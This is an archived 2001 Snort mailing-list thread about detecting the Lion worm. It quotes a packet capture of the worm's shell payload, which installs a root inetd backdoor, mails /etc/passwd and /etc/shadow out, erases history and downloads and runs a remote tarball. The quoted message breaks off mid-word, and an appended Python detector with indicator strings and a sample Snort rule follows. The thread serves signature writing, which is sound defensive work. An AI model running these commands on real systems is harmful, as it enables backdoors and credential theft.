1i0n (aka lion worm) RE: [Snort-users] New Worm Virus is in the wild

Max Vision vision at ...4...
Fri Mar 23 15:02:25 EST 2001


Hi,

I created a signature to detect this attack February 8th, when the exploit
was released (IDS482/named-exploit-tsig-infoleak) - I did this because LSD
were the first people to release a *decent* working BIND exploit.  So I
wrote a signature for it... sure enough that is exactly what is used by
this worm.  People using vision.conf since February 8th should have seen
alerts for this attack (if the worm dropped by, whether it was successful
or not).

Also I have been working on a detailed writeup but have suffered some
hardware problems this morning delaying its release.

Max Vision
http://whitehats.com/
http://maxvision.net/


On Fri, 23 Mar 2001, Andreas Östling wrote:

> On Fri, 23 Mar 2001 Kevin.Brown at ...1022... wrote:
>
> > So there is already a signature for this?  I knew there was a Ramen sig,
> > does this show up the same?
>
> Here is what Lion in action looks like if you want to write a specific and
> optimized rule to catch it:
>
> Attacker:1046 -> victim:53 TCP TTL:49 TOS:0x0 ID:58766 IpLen:20 DgmLen:552 DF
> ***AP*** Seq: 0xA6DDEA8C  Ack: 0xFE355B80  Win: 0x7D78  TcpLen: 32
> TCP Options (3) => NOP NOP TS: 48934346 5847363
> PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin';export PAT
> H;export TERM=vt100;rm -rf /dev/.lib;mkdir /dev/.lib;cd /dev/.li
> b;echo '1008 stream tcp nowait root /bin/sh sh' >>/etc/inetd.con
> f;killall -HUP inetd;ifconfig -a>1i0n;cat /etc/passwd >>1i0n;cat
>  /etc/shadow >>1i0n;mail 1i0nip at ...1434... <1i0n;rm -fr 1i0n;rm -
> fr /.bash_history;lynx -dump http://coollion.51.net/crew.tgz >1i
> 0n.tgz;tar -zxvf 1i0n.tgz;rm -fr 1i0n.tgz;cd lib;./1i0n.sh;exit
>
>
> I captured this packet by using a rule which simply checks for the st
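The quoted capture is the basis for a "specific and optimized rule", as Andreas puts it: a content match on a string that only the worm's shell payload carries. The following is an added example, not code from the original thread or from Snort; it mimics what a Snort content rule does in plain Python so the matching logic can be run offline against the dump. The sample dump lines are constructed from fragments of the payload above (the mail address is replaced by a placeholder), and the Snort rule in the comment assumes Snort 1.x rule syntax. The point it makes beyond the post: Snort's ASCII dump wraps the payload at 64 columns, so an indicator such as `rm -fr /.bash_history` is split across two dump lines and a per-line match misses it; match on the reassembled payload instead.

```python
"""Content-match detector for the Lion (1i0n) worm payload.

Added example (not from the original post). It reproduces the effect of a
Snort content rule on TCP traffic to port 53: look for distinctive
substrings in the payload and report which indicators were hit.

Equivalent Snort 1.x rule (syntax assumed, not taken from the post):
  alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"Lion worm inetd \
      backdoor install"; flags:A+; \
      content:"1008 stream tcp nowait root /bin/sh sh";)
"""

# Distinctive fragments of the captured payload. Each one is specific to the
# worm's shell script rather than to the BIND TSIG exploit it rides on.
LION_INDICATORS = {
    "inetd_backdoor": b"1008 stream tcp nowait root /bin/sh sh",
    "hidden_dir": b"/dev/.lib",
    "dropfile": b"1i0n",
    "history_wipe": b"rm -fr /.bash_history",
}

# Constructed sample: payload lines as Snort's ASCII dump prints them,
# wrapped at 64 columns. The mail address is a placeholder, not the real one.
SAMPLE_DUMP = [
    "PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin';export PAT",
    "H;export TERM=vt100;rm -rf /dev/.lib;mkdir /dev/.lib;cd /dev/.li",
    "b;echo '1008 stream tcp nowait root /bin/sh sh' >>/etc/inetd.con",
    "f;killall -HUP inetd;ifconfig -a>1i0n;cat /etc/passwd >>1i0n;cat",
    " /etc/shadow >>1i0n;mail lion@invalid.example <1i0n;rm -fr 1i0n;rm -",
    "fr /.bash_history;exit",
]


def unwrap_snort_dump(dump_lines):
    """Rebuild the raw payload bytes from Snort's wrapped ASCII dump.

    The dump holds up to 64 payload characters per line with no separator,
    so concatenating the lines restores the original byte string.
    """
    return "".join(dump_lines).encode("latin-1")


def match_lion(payload, dst_port=53):
    """Return the names of indicators present in `payload`.

    Only traffic to the DNS port is considered, as the rule would be written;
    an empty list means no hit.
    """
    if dst_port != 53:
        return []
    return [name for name, pat in LION_INDICATORS.items() if pat in payload]


def match_per_line(dump_lines):
    """Naive variant: match each dump line on its own.

    Shown for contrast; indicators that straddle a 64-column wrap are missed.
    """
    hits = set()
    for line in dump_lines:
        hits.update(match_lion(line.encode("latin-1")))
    return sorted(hits)


if __name__ == "__main__":
    payload = unwrap_snort_dump(SAMPLE_DUMP)
    print("reassembled payload:", match_lion(payload))
    print("per dump line:      ", match_per_line(SAMPLE_DUMP))
```

Running the module shows all four indicators on the reassembled payload but only three when each dump line is matched separately, which is why a detector (or a Snort rule, which operates on the packet payload rather than the printed dump) must be written against the unwrapped data. Matching on the inetd line is the most robust single choice: it is the part of the script an operator would least want to see succeed, and it is unlikely to occur in legitimate DNS traffic.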
